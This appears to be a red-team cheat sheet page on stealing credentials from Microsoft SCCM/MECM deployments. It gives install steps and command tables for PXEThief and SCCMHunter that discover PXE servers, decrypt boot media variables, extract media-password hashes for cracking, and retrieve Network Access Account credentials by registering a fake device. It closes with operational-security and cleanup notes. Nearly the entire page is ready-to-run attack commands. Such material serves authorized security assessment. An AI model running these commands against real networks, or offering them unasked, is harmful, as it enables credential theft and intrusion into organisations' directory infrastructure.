Skip to content

PXE / SCCM Credential Exposure

Extract Network Access Account (NAA) passwords, task-sequence credentials, and collection-variable secrets from SCCM / MECM deployment data.

Quick start (PXEThief)

  • Requires a reachable distribution point (DP) offering PXE deployment to your host. No domain credentials required; the media password must be absent, known, or cracked.
  • PXEThief requires Windows, Python, Npcap, and the TFTP client.
git clone https://github.com/MWR-CyberSec/PXEThief.git
cd PXEThief
python -m pip install -r requirements.txt

Set manual_interface_selection_by_id = <interface_id> under [SCAPY SETTINGS] in settings.ini before modes 1 / 2. Packet-capture permissions required.

Action Command
List interfaces python pxethief.py 10
Discover a PXE server through DHCP python pxethief.py 1
Target a known DP python pxethief.py 2 <dp_ip>
Extract media-password cracking material python pxethief.py 5 "<variables_file>"
Decrypt media variables and retrieve policies python pxethief.py 3 "<variables_file>" "<media_password>"
  • Modes 1 / 2 print TFTP commands. Download protected media before using modes 5 / 3.
  • auto_exploit_blank_password = 1 (default) automatically downloads/decrypts unprotected media and retrieves policies. Set to 0 to print download commands only.
  • Mode 5 outputs $sccm$aes128$... for this Hashcat module. Copy the hash without status text. Cracking recovers the media password, not an AD password.

SCCMHunter

git clone https://github.com/garrettfoster13/sccmhunter.git
cd sccmhunter
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt

Discovery

Requires AD credentials and LDAP access. Run find before smb.

Action Command
Find SCCM infrastructure python3 sccmhunter.py find -u '<user>' -p '<password>' -d <domain> -dc-ip <dc_ip>
Review discovered infrastructure python3 sccmhunter.py show -all
Profile servers and save PXE variables python3 sccmhunter.py smb -u '<user>' -p '<password>' -d <domain> -dc-ip <dc_ip> -save
  • find checks System Management, published management points, WDS objects, and SCCM/MECM names.
  • -save downloads readable REMINST/SMSTemp/*.var files to ~/.sccmhunter/logs/loot/; decrypt with PXEThief.

smb also probes HTTP/MSSQL and may start Remote Registry. Verify service-state restoration afterward.

NAA credentials

Requires computer-account credentials and a management point (MP) accepting registration and NAA policy requests. http registers an SCCM device identity.

Action Command
Retrieve NAA credentials with Kerberos python3 sccmhunter.py http -d <domain> -dc-ip <dc_ip> -mp <mp_fqdn> -cn '<computer>$' -cp '<computer_password>' -ck
Review recovered credentials python3 sccmhunter.py show -creds
  • -mp identifies the MP, which may differ from the PXE DP. Kerberos requires a resolvable FQDN and synchronized clock.
  • -ck: computer-account Kerberos. -cn / -cp: existing computer credentials.
  • -auto creates an AD computer account, requiring permissions/quota.

Notes / OPSEC

  • NAA: Reads deployment content; not inherently privileged. Task-sequence execution accounts are separate.
  • Network: DHCP/PXE uses UDP 67/68/4011. Direct DP requests can cross routed networks. TFTP needs UDP/69 and negotiated transfer ports; policy retrieval needs MP connectivity.
  • Deployment: PXEThief retrieves files without booting. Booting a task sequence can reimage the host.
  • Cleanup: Remove assessment-created SCCM registrations and AD objects.
  • Output: PXEThief writes decrypted data/certificates locally; SCCMHunter uses ~/.sccmhunter/.

References